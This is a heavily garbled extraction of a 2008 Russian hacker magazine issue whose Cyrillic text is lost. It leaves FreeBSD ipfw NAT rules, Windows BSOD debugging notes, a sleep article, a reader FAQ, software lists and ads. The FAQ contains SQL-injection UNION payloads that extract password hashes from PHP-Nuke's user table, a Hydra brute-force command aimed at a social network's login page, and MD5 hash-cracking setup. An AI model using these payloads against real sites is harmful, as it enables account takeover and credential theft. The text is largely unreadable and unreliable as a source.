172.16.0.0/16 to 213.200.0.0/24
# ipfw add 1100 divert 8668 ip from
172.16.0.0/16 to any
# ipfw add 1200 divert 8669 ip from any to
192.168.1.2
# ipfw add 1300 divert 8668 ip from any to
100.100.100.102
# ipfw add 1500 fwd 192.168.1.1 ip from
192.168.1.2 to any
, , ,
NAT. ,
192.168.1.2 ,
, .
,
from, to, ,
( , ):
# ipfw
to any
# ipfw
80
# ipfw
# ipfw
uid 0

add 10000 divert 8669 all from 172.16/16


add 10010 divert 8669 all from any to any
add 10020 divert 8669 udp from any to any
add 10030 divert 8669 all from any to any

x 05 /113/ 08

, ( )
,
.
NAT , ,
, .
,
.
?
- -
IP- ? , .
,
,
.
, , . ,
, :
# ipfw add 1000 divert 8669 ip from
172.16.0.0/24 to any
# ipfw add 1100 divert 8668 ip from
172.16.0.0/16 to any
# ipfw add 1200 divert 8669 ip from any to
192.168.1.2
# ipfw add 1300 divert 8668 ip from any to
100.100.100.102
# ipfw add 1500 fwd 192.168.1.1 ip from
192.168.1.2 to any

1000
172.168.0.x natd,
8669; 1100 , NAT
172.168.x.x.

, forward

.
,
IPFIREWALL,
IPFIREWALL_
FORWARD , ,
IPDIVERT.
FreeBSD 7.0

IPFIREWALL_NAT
LIBALIAS ( ).


IP- ,


.

(,
) ,
.


( round-robin)
OpenBSD

,

][ #092.

3:
Sendmail ,
,
NAT . ,
:
1. 192.168.1.1 ("route add default
192.168.1.1").
2. , ed0.
3. Sendmail , .
. SMTP -

links
www.
opennet.ru www.
dreamcatcher.ru

,
.

141

>> .PRO
DNS- MX-, rl0
(100.100.100.102).
, ed0? Sendmail :
$ grep CLIENT /etc/mail/my.domain.ru.mc
CLIENT_OPTIONS('Addr=100.100.100.102')dnl
:
# cd /etc/mail
# make
# make install && make restart
, ,
, :
# ipfw add 1000 fwd 100.100.100.101 ip from
100.100.100.102 to any
, , , to
any 25, .
MTA ,
.

4:

:

NAT-. -. ipfw
.
, Squid
ACL-:
$ grep buh /usr/local/etc/squid/squid.conf
acl lan src 172.16.0.0/255.255.0.0
acl buh src 172.16.1.0/255.255.255.0
tcp_outgoing_address 192.168.1.1 buh
tcp_outgoing_address 100.100.100.102 lan

.
, ,
( , , ..) .
, -
. PPP- (
ADSL PPPoE)
if-up if-down ( ; , , ).
IP- , ping,
. , PPP-
,
. , , . ,
ping. ,
,
, , .

142

Squid- , ,
:
# ipfw add 1500 fwd 192.168.1.1 ip from 192.168.1.2 to
any
100.100.100.102
, , defaultrouter.

5:
, .
,
. , NAT- - .
, , . ipfw skipto prob:
# natd -a 100.100.100.102 -p 8668
# natd -a 192.168.1.1 -p 8669
# ipfw add 0500 check-state
# ipfw add 0900 prob 0.330000 skipto 1100 tcp from
172.16.0.0/16 to any setup keep-state
# ipfw add 1000 divert 8668 ip from 172.16.0.0/16 to any
# ipfw add 1050 skipto 1200 ip from any to any
# ipfw add 1100 divert 8669 ip from 172.16.0.0/16 to any
# ipfw add 1200 divert 8668 ip from any to
100.100.100.102 via rl0
# ipfw add 1300 divert 8669 ip from any to 192.168.1.2
via ed0
# ipfw add 1500 fwd 192.168.1.1 ip from 192.168.1.2 to
any
,
NAT, . (keep-state/
check-state) , ,
, .
, TCP-
skipto (
prob), 500
1100. ,
,
, .
nat- FreeBSD 7.0,
, sysctl- net.
inet.ip.fw.one_pass.
, nat-
;
:
# sysctl net.inet.ip.fw.one_pass=0
net.inet.ip.fw.one_pass: 1 -> 0
.


, .
IP- ,
. ( ) NAT.
,
.z

x 05 /113/ 08

>> .pro


BSOD
WINDOWS SErVEr 2003

,
. ,
,
. ,
, Server 2003 Standard Edition.
NT.
,
, .
: ,
..
KeBugCheckEx, BSOD
( ). (, SoftICE) KeBugCheckEx,
.
,
.
NT, , ,
(!) . NT 4.x ( ) call-back (
) KeBugCheckEx, , ,
, .
Server 2008, call-back
( NTFS , , ?!).

144

NT
.
Linux, xBSD ,
.
(kernel panic BSOD).
, NT : ( );
, (
,
); KeBugCheckEx
-. ? ,
, .
BSOD : , rootkit. API-
(
), .
, /rootkit.
, ,

x 05 /113/ 08

>> .PRO

Win2k3 VM Ware

, NT (
,
,
)

IRQL_LESS_OR_EQUAL
,
,
,

info
, ,
/
( BIOS ). (
,
).
, /
rootkit. , rootkit (][ , ), .
, ,
,
,
DriverStudio, , .
( ).
, , (
, ),
,
. , ,
.


.
.
boot.ini. boot.ini,
, , .
MSDN: support.microsoft.
com/kb/833721/ru ( )
Boot.ini options reference
www.ingenieroguzman.com.ar.
. NT , .
gflags.exe,
Support Tools, DDK,
Microsoft.
. Win2k3 128
,
. , (
) Google .

(, , ReactOS ..).

x 05 /113/ 08

BSOD


,
. ,
. :
A I IRQL=PASSIVE_LEVEL,
B II IRQL.
Device 1 I ,
, IRQL I DIRQL
Device 1.
DpcForIsr() .

, (
I).
Device 1 ,
II, I
IRQL.
IRQL II DIRQL
Device 1,
DpcForIsr()
II.
, , IRQL,
, I II.
, DpcForIsr()
,
! ,

.
?
, ,
/ONECPU /NUMPROC=1
boot.ini. , ,


BSOD, ,
.
BSOD IRQL_
LESS_OR_EQUAL,
? , ? NT
Interrupt Request Levels (


BSOD

MSDN,
DDK. ,
, ,
,
,




.





BSOD,
,
.

145

>> .pro

gflags.exe Microsoft Techcenter

DDK

links
Boot.ini
options reference
www.
ingenieroguzman.
com.ar.

dvd

Windows
Server 2003 SP1 DDK.

146

IRQ), 0
31. 0 , 31 .
(PASSIVE LEVEL == 0),
,
. IRQL
ISR
(Interrupt Service Routine ), ,
2, , ,
3.
, ! , , .
, , , BSOD.
? ,
. ,
DisablePagingExecutive (
DWORD) 1 (
: HKLM\SYSTEM\CurrentControlSet\Control\
SessionManager\MemoryManagement).
gflags.exe dps, .
.
(
),
. , DoS ,

, , BSOD
IRQL_LESS_OR_EQUAL.
, Win2k3 SP2 ,
SafeSEH BSOD

, DbgPrint,
.
16h Exploits Review,
][. BSOD
gflags.exe ddp.
, BSOD
- ,
( ?) VGA boot.ini
/BASEVIDEO.
(Physical Address Extensions
PAE). 4 ,
Win2k3 Standard Edition
, Enterprise Edition.
DEP (Data Execution
Prevention), Win2k3 SP1, PAE, , .
,
PAE
, .
/NOPAE boot.ini
.
BSOD
, ,
(
).


VM Ware,

. BSOD
. , VM
Ware
. , .

,
boot.ini. , ,
boot.ini
,
Win2k3 ( , ).z

x 05 /113/ 08

>> units

? : (, ,
) !
, , , . , , ,

?
, ,
, ,
,
.
, , .
, ,
LCD- .
,
, ,

148

,
,
,
, .
,
, , ,
!
, ,
, . , Wikipedia
x 05 /113/ 08

>> units

( )
.
, . (
), ,
.
,
.
. , !

Memento (),

Sleep Sleep deprivation ,


, (
, , ).
, , etc, , ,
,
.


.
(~36 ).
(~12 ),
/ .
.
, . (
) , .
(-, ).

6-9 ( ,
!).
~4
( ).
,
, , , (
x 05 /113/ 08

), , , ,
.
, . ,
.
, , . ,
36 , ,
.
, !
REM-,
,
.

,
. ! .

warning
,
,


.

links

: en.wikipedia.
org, :
Sleep Sleep_
deprivation.


. ( )
? , .
, , ( ). ,
: .
, ( , , growth
hormone). , ,
,
, (
, -

149

>> units

growth-

). ,
. ,
, .


, , ,
.
. , ,
, , ,

, ~24 ( ).

, 6 .
, ,
. ,
(
, ). ,
.
, . , ,
, , , .
,
. ,
, , . Ts. , - ,
,
Ta, , X, (X Ta).
( , ,
), : X
,
/.
, ,
, .

150


; -
.
,
(
).
.
(, ). , ,
, . (
Memento).
,
, , , ,
. , ,
, .
, . ,
, , . ,
, ,
.
, - , ,
, .
( , )
, ,
, .

( ) ( ),
, ( ), .
, , ,
, - !
, hypothalamic-pituitary-adrenal axis (, HPA).
(
) , , , .
, .

!
, ( , ), , .
x 05 /113/ 08

>> units

.
( ) -
, .
( )
, .
,
.
48 ( ),
,
( ),
.
72 ( )
, ,
. ,

. .
, ,
.
, (,
!).
(- ) ,
,
, , ,
. -
(
, ). ,

(, ),
,
. - ,
.

( , , ).
x 05 /113/ 08


.

, ,
. (
), ( )
,
: , ,
,
( 4-6 ).
- ,
, . ,
(, ) , .
( 36 )
(
, ).
, ,
,
. ,
.
,

. ,
,
. , , ,
.

()
,
.
, , , , , ,
. ! , ,
, , , ( , ).

,
. ,
( , ). , ,
. z

info



,



.
, ,



, ,


.

,
.

151

>> units
Corwin

Step
/ faq@real.xakep.ru

/ corwin88@mail.ru /

FAQ U N I T E D
, ! ,
. !
, .

Q: ,
, 100% .
A: , LIMIT. : http://target/script.
php?p=-1 union select 1,2,user,4 from
users/*, limit n:
http://target/script.php?p=-1 union
select 1,2,user,4 from users limit
n,1/*, n 0-9.
Q:
SQL-injection .
PHP(Post)-Nuke.
A: , ,

152

, e-mail
. ( ):
http://localhost/modules.php?op=
modload&name=Messages&file=read
pmsg&start=9999%20union%20select
1,2,3,4,5,6,pn_pass,8+from+nuke_
users where pn_email='admin@
localhost.com'/*
PHP-Nuke pn_uid=2 (pn_uid=1
(Anonymous)):

http://localhost/modules.php?op=
modload&name=Messages&file=read
pmsg&start=9999%20union%20select
1,2,3,4,5,6,pn_pass,8+from+nuke_
users where pn_uid=2/*
Q: , , ,
, .
,
grsec.
A: , 2.6.22.9grsec.
, grsec ,
. ,
.
x 05 /113/ 08

>> units

Q: Java- ?
A: . - (bytecode
verifier) -,

.
Java
,
.
, ,

(public, private, protected).
Q: ,
John
the Ripper, raw ()
MD5. ?
A: JtR
(http://openwall.com/john) ,
raw MD5.
.
, JtR. :
mkdir john
cd john
wget http://www.openwall.com/john/
f/john-1.7.2.tar.bz2
tar -xvf john-1.7.2.tar
cd john-1.7.2
wget ftp://ftp.openwall.com/
pub/projects/john/contrib/john1.7.2all-9.diff.gz
gzip -d john-1.7.2all-9.diff.gz
patch -p1 < john-1.7.2all-9.diff.gz
cd src
make
make clean linux-x86any

:
./john -format=raw-MD5 /home/
corwin/md5_hashes.txt.
Q:
,
,
.
x 05 /113/ 08

A: GET, .
MySQL/
MSSQL, POST-,
, nsTview v3.1.Post (http://nst.void.
ru/?q=releases&download=16).
Q: SQL-
MySQL,
: Illegal mix of collations
(latin1_swedish_ci,IMPLICIT) and (utf8_
general_ci,SYSCONST) for operation UNION
A:
version() convert(version()
using latin1).
Q:
, NASL,
?
A: : NASL (Nessus Attack
Scripting Language Nessus)
Nessus.
NASL- , ,
Perl-, NASL.
Q: VPN-. :
1) , ,
, ?
2) ,
(/ )
-?
3) Double VPN?
4) -,

?
A: 1) - ,
. .
,
, , , _
VPN.
, VPN- , , . ,
.
, , , ,
VPN
.

, , ,
, , .
,
http://ru.wikipedia.
org/wiki/VPN.
2) VPN- VMWare,
( , Ethereal),
VPN-, .
3) IP-. VPN
,
. , IP.
4) , -
. , ,
.
Q: fuzzing,
. ?
A: ,
,

, ,
.
Linux(and Solaris)
sharefuzz,
setuid.
windows- OWASP
JBroFuzz ,
HTTP, SOAP, XML, LDAP . XSS, SQL-injection, , FSE
.
Google Code . , Bunny the Fuzzer (http://code.
google.com/p/bunny-the-fuzzer) , C. Linux,
FreeBSD, OpenBSD, Cygwin.
Q: Red box, Black box
Blue box.
?
A:
,
, -, .

153

>> units

Red box , ,
. ,
:).
Black box ,
. ,
.
.
Blue box 2600 hz ,
.
,

.
Q: Gmail-?
A: Microsoft Outlook, Outlook Express
Thunderbird, Google Email Uploader (https://
mail.google.com/mail/help/email_uploader.
html). , The
Bat! .
, ? :)
Q: -,
?
A: , , ,
.
/
.. odnoklassniki.ru
xss ( ).
, , , ( ).
.
.
Hydra (http://freeworld.thc.org/
thc-hydra),

154

( ,
.) ( /):
hydra -l useremail%40domainzone
-P passlist.txt vkontakte.
ru http-post-form "/login.php:
email=^USER^&pass=^PASS^:Target"
passlist.txt ,
useremail%40domainzone email , . ,
admin%40vkontakte.ru :).

, ., . ..

- , -
.
P.S.
.
Q: MySQL-,
?
A: bin/mysqldump --user={username}
--password={pass} --databases
{dbname} > /home/corwin/dump.sql
, {username} , {pass}, , ,
{dbname} ,
,
.
Q: USB
?
A: : . ,
NT-,
Windows
Server 2003/2008.
DeviceLock (www.devicelock.
com), -


, ,
(
).
,

,
.

. ,
CD-ROM,
Floppy, USB Removable .
Active Directory,
.
: www.petri.
co.il/disable_usb_disks_with_gpo.htm
Q:
( )
. API - (
YouTube),
. Flash ?
A: ! -
, : - ?
Flowplayer
(www.flowplayer.org) ,
.

: FLV, SWF, MP3, MP4, H.264.
FlowPlayer
,
,
, YouTube.
Q: ,
. , - ,
. ?
A: -, Memtest86 x 05 /113/ 08

>> units

(Chris Brady),
. ( )
, , .
Microsoft Windows Memory
Diagnostic.
.
S&M (http://testmem.nm.ru/snm.htm)
.
,
.

( , ),
.
Q: WebDAV ?
A: Web-based Distributed Authoring and Versioning WebDAV Hypertext Transfer Protocol (HTTP),

WWW . ,

FTP SMB. ,
:
;
(, );
( );
() ;
.
, WebDAV
. WebDAV Windows 2000 ( )
:
URL- WebDAV.
. WebDAV ,
,
http://test.webdav.org/. ,
http-, Apache mod_dav. ,

Apache, - -
. z
x 05 /113/ 08

155

1980 .

( 15%
)

. ,

! !

DVD + DVD + IT CD:


- 147
( 25% , )

. 86

ww w.x ake

p.ru
2008

IT-

200 8
04 (112 )

#05

XML



OD
BS


. 70

. 58

. 32

. 94

oth

Blueto

46
.


mail.
@
ru

C#
. 118

65

. 74

. 36



D
DR3


?
.38
#05 |51
|
2008

:
, ,
,


. 57

032-0
52

3060

NVIDI
A 9600GT
ATI/A
MD Ra
ADSL
deon
c + WI-FI

AM

D Hybrid Cr

D ossFire

Inark Side
tel Over
Drive

DVD

5292


.

113

12

1.  , ,
www.glc.ru.
2. .
3.  :
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,

. , . 11, . 44,
, .

 ;
20
.
,
.
,
. , , .

+DVD 6 1080 .
, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru

>Misc
Ceedo 2.2.1.23
DExposE2
EssentialPIM Free 2.5
EssentialPIM Pro 2.5
KeePass 1.11
ljCrab
Nullsoft Install System (NSIS) 2.36
OCR CuneiForm 12
PrinterShare 1.0
SAS.
SpotAuditor 3.7.1
TagScanner 5.0
Time Boss PRO 2.37
Translate.Net 0.1
TranslateIt! 6.5
TUGZip 3.5.0.0
xStarter 1.9.0

>Games
Motorama 1.1
Soldat 1.4.2

>Development
Axure RP Pro 5.0
CodeVeil 1.3
Construct 0.94.3
DeployLX 3.1
FreeBASIC 0.18.5b
Google App Engine SDK 1.0 B
Javascript Obfuscator 3.0.5
NetBeans IDE 6.1
PECompact 2.80 beta 1
phpDesigner 2008 6.0.2
Robocode 1.6
Visual C++ 2008 Feature Pack
Windows Mobile 6 Professional SDK
Adobe

>>WINDOWS
>Dailysoft
7-Zip 4.57
Comodo Firewall Version 3.0
DAEMON Tools Lite 4.12.3
Download Master 5.5.3.1131
FarPowerPack 1.15
FileZilla Client 3.0.9.2
IrfanView 4.10
K-Lite Mega Codec Pack 3.9.0
Miranda IM 0.7.5
mIRC 6.31
Mozilla Firefox 2.0.0.14
Notepad++ 4.9.1
Opera 9.27
PuTTY 0.60
QIP 2005 8050
Skype 3.8.0
Total Commander 7.03
Unlocker 1.8.7
Winamp Media Player 5.53
Xakep CD DataSaver 5.2

>>UNIX
>Desktop
Abiword 2.6.2
Alsaplayer 0.99.80

>System
Auslogics Emergency Recovery
2.1.13
Auslogics Registry Defrag 4.1.9.96
Comandiux 1.7.27.220
MikeOS 1.3.0
Parallels Workstation 2.2
Parted Magic 2.1
Postgres Plus Advanced Server 8.3
PowerStrip 3.78
Process Explorer 11.13
Super Flexible File Synchronizer
4.12a
USB Disk Security V5.0.0.60
VirtualBox 1.6
Windows Vista Service Pack 1
XYplorer 7.10

>Security
EchoMirage 1.2
EffeTech HTTP Sniffer v4.1
net-snmp 5.4.13
Odysseus 2.0.0.84
Telemachus 1.0

>Net
A1 Website Download 1.3.2
Avant Browser 11.6
Deluge 0.5.9.0
digsby
Gogrok 1.0
Google Talk Labs Edition
IM-History Client Suite 1.2.4
ooVoo 1.5.1.97
SecureCRT 6.0.2
Serv-U 7.0.0.4
ShareAlarmPro 2.0.3
Skype for Windows 3.8.0
StrongDC++ 2.12
Xfire 1.91
YoutubeGet 4.4

>Multimedia
Adobe Photoshop Lightroom 2.0 Beta
AIMP 2.50b
Artweaver 0.5.1
Blender for Windows 2.46 RC3
DeskScapes 1.02
doPDF 6.0.259
Easy CD-DA Extractor 11.5.2
Google Earth for Windows 4.3B
Jing
Keyboard Music 2.4
Pixelformer 0.8.1
ProgDVB 5.14.4
STDU Viewer 1.4
StyleBuilder 2.0 Beta
WinWatermark 2.5

>Server
Amavisd-new 2.6.0-rc2
Apache 2.2.8
Asterisk 1.4.19
Bind 9.4.2
Courier-imap 4.3.1
Cups 1.3.7
Dbmail 2.2.9
Dhcp 4.1.0a1
Dovecot 1.0.13
Mysql 5.0.51a
Nut 2.2.1
Openldap 2.3.39
Openssh 5.0p1

>Security
Clamav 0.93
Dansguardian 2.9.9.3
Flawfinder 1.27
Gnupg 2.0.9
Iplog 2.2.3
Rkhunter 1.3.2
Sing 1.1
Sudo 1.6.9p15
Truecrypt 5.1a

>Net
Cgmail 0.5
Claws-mail 3.4.0
Dspam 3.8.0
Empathy 0.22.1
Fetchmail 6.3.8
Hylafax 4.4.4
Linuxdcpp 1.0.1
Opera 9.27
Webmonx 0.3.2

>Games
Allacrost 0.2.1
Bzflag 2.0.10
Lbreakout2 2.6beta-7
Lincity-ng 1.91beta
Warzone2100 2.1beta2

>Devel
Binutils 2.18
Boost 1.35.0
Ccache 2.4
Fucc 0.2
Gcc 4.3.0
Nasm 2.02
Python 2.5.2
Qt 4.3.4
Scons 0.98.1
Seed7 20080406

Blender 2.45
Enlightenment 0.16.8.12
Gmpc 0.15.5.0
Ksquirrel 0.8.0
Mpg123 1.4.2
Openoffice 2.4.0 pro
Qlabels 0.2

>
Radio-T
Hack
In The Box 2008

>Xakep.PRO
Longhorn
PPP

>Visualhack++
Agnitum.com


Oracle

>X-Distrib
Ubuntu 8.04

>System
Alsa-driver 1.0.16
Ati 8.4
BSD Ports
Dosemu 1.4.0
Iat 0.1.3
Linux 2.6.25
Nerolinux 3.5.0.1
Nvidia 169.12
Peazip 2.0
Powertop 1.9
Tea 17.6.0
Tracker 0.6.6

Openvpn 2.1_rc7
Postfix 2.5.1
Postgresql 8.3.1
Samba 3.0.28a
Sendmail 8.14.2
Snort 2.8.1
Sqlite 3.5.8
Squid 3.0STABLE4
Vsftpd 2.0.6

05(113) 2008

.4

. 52


Oracle

. 30

web-

. 62

web-

05 (113) 2008

. 138

. 122

www.xakep.ru

-
FreebSD

. 116

TV

SIM-

! .
.
: +7 (495) 780 88 25
: sales@gamepost.ru

:
(495) 780-8825

Nintendo Wii

PlayStation 2 Slim

9984 .

5200 .

Advance Wars:
Days of Ruin
1248 .

Blacksite: Area 51
(PAL)
2132 .

Final Fantasy Crystal


Call of Duty 4:
Chronicles Ring of Fates Modern Warfare
1508 .
1482 .

Gran Turismo 5
Prologue (PAL)
1300 .

Hitman Trilogy
1560 .

Xbox 360 Elite (120 GB)

17680 .

PlayStation 3 (40Gb)

PSP Slim & Lite

15990 .

7280 .

3-

Burnout Paradise
2080 .

Dark Messiah of Might Condemned 2


and Magic - Elements
2132 .
1950 .

Devil May Cry 4


2470 .

Medal of Honor:
Metal Gear Solid
Resident Evil: The
Fire Emblem:
Essentials Collection Complete Collections Umbrella Chronicles Radiant Dawn
1820 .
1924 .
1820 .
1560 .

God of War:
Chains of
Olympus
1248 .

Viking: Battle for


Asgard
1950 .

Final Fantasy Tactics:


The War of The Lions (PAL)
1560 .

Army of Two
(PAL)
2210 .

http://

WWW2

- web-,

.


Google
picasaweb.google.com
, . DVD- :
. , ? !
, , . , Google? Picasa
Web Albums 1 ,
.
Picasa
.


www.im-history.com

.
Skype, Jabber,
, .
, ,
. , ,
.
im-history, , ,
, !

160

My Cool Button 2.0


www.mycoolbutton.com

2.0: , , .
, , ,
- . ,
.
, , , , - , --, .

Online-

www.extreme.outervision.
com/psucalculator.jsp
,
, . , -
! ,
. . Last.fm, ,
(EMI, Sony BMG,
Universal, Warner), . , :).

x 05 /113/ 08

x 05()08

web-/ 7 web-

113